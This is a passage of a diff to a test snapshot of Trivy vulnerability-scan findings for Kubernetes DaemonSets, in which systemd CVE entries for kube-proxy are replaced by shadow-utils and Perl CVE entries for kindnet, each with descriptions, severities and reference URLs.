v241-stable)", - "https://linux.oracle.com/cve/CVE-2019-3843.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3843", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/108116", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3843", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3844", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "http://www.securityfocus.com/bid/108096", - "https://access.redhat.com/security/cve/CVE-2019-3844", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", - "https://linux.oracle.com/cve/CVE-2019-3844.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3844", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/108096", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3844", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "value": "https://github.com/shadow-maint/shadow/pull/687", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + }, + { + "type": "URL", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + }, + { + "type": "URL", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "241-7~deb10u9", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-26604", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-16156", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-26604", - "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", - "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", - "https://github.com/systemd/systemd/issues/5666", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", - "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", - "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", - "https://security.netapp.com/advisory/ntap-20230505-0009/", - "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "https://access.redhat.com/security/cve/CVE-2020-16156", + "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "https://ubuntu.com/security/notices/USN-5689-1", + "https://ubuntu.com/security/notices/USN-5689-2", + "https://www.cve.org/CVERecord?id=CVE-2020-16156", ], }, "category": "Vulnerability", - "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "CPAN 2.28 allows Signature Verification Bypass.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "privilege escalation via the less pager", + "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-26604", + "value": "https://avd.aquasec.com/nvd/cve-2020-16156", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-26604", + "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", }, { "type": "URL", - "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "value": "https://access.redhat.com/security/cve/CVE-2020-16156", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/5666", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", }, { "type": "URL", - "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", + "value": "https://ubuntu.com/security/notices/USN-5689-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "value": "https://ubuntu.com/security/notices/USN-5689-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "241-7~deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33910", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31484", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", - "https://access.redhat.com/security/cve/CVE-2021-33910", - "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", - "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", - "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", - "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", - "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", - "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", - "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", - "https://linux.oracle.com/cve/CVE-2021-33910.html", - "https://linux.oracle.com/errata/ELSA-2021-2717.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20211104-0008/", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33910", - "https://www.debian.org/security/2021/dsa-4942", - "https://www.openwall.com/lists/oss-security/2021/07/20/2", - "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "https://github.com/andk/cpanpm/pull/175", + "https://metacpan.org/dist/CPAN/changes", + "https://ubuntu.com/security/notices/USN-6112-1", + "https://ubuntu.com/security/notices/USN-6112-2", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", ], }, "category": "Vulnerability", - "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", + "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33910", + "value": "https://avd.aquasec.com/nvd/cve-2023-31484", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33910", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "value": "https://github.com/andk/cpanpm/pull/175", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "value": "https://metacpan.org/dist/CPAN/changes", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "value": "https://ubuntu.com/security/notices/USN-6112-1", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "value": "https://ubuntu.com/security/notices/USN-6112-2", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-4116", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "https://access.redhat.com/security/cve/CVE-2011-4116", + "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "https://seclists.org/oss-sec/2011/q4/238", + "https://www.cve.org/CVERecord?id=CVE-2011-4116", + ], + }, + "category": "Vulnerability", + "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "perl: File::Temp insecure temporary file handling", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "value": "https://avd.aquasec.com/nvd/cve-2011-4116", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "value": "https://access.redhat.com/security/cve/CVE-2011-4116", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://seclists.org/oss-sec/2011/q4/238", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31486", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://hackeriet.github.io/cpan-http-tiny-overview/", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + ], + }, + "category": "Vulnerability", + "description": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standa ...", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://avd.aquasec.com/nvd/cve-2023-31486", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4942", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3997", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3997", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", - "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5226-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3997", - "https://www.openwall.com/lists/oss-security/2022/01/10/2", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3997", + "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", }, { 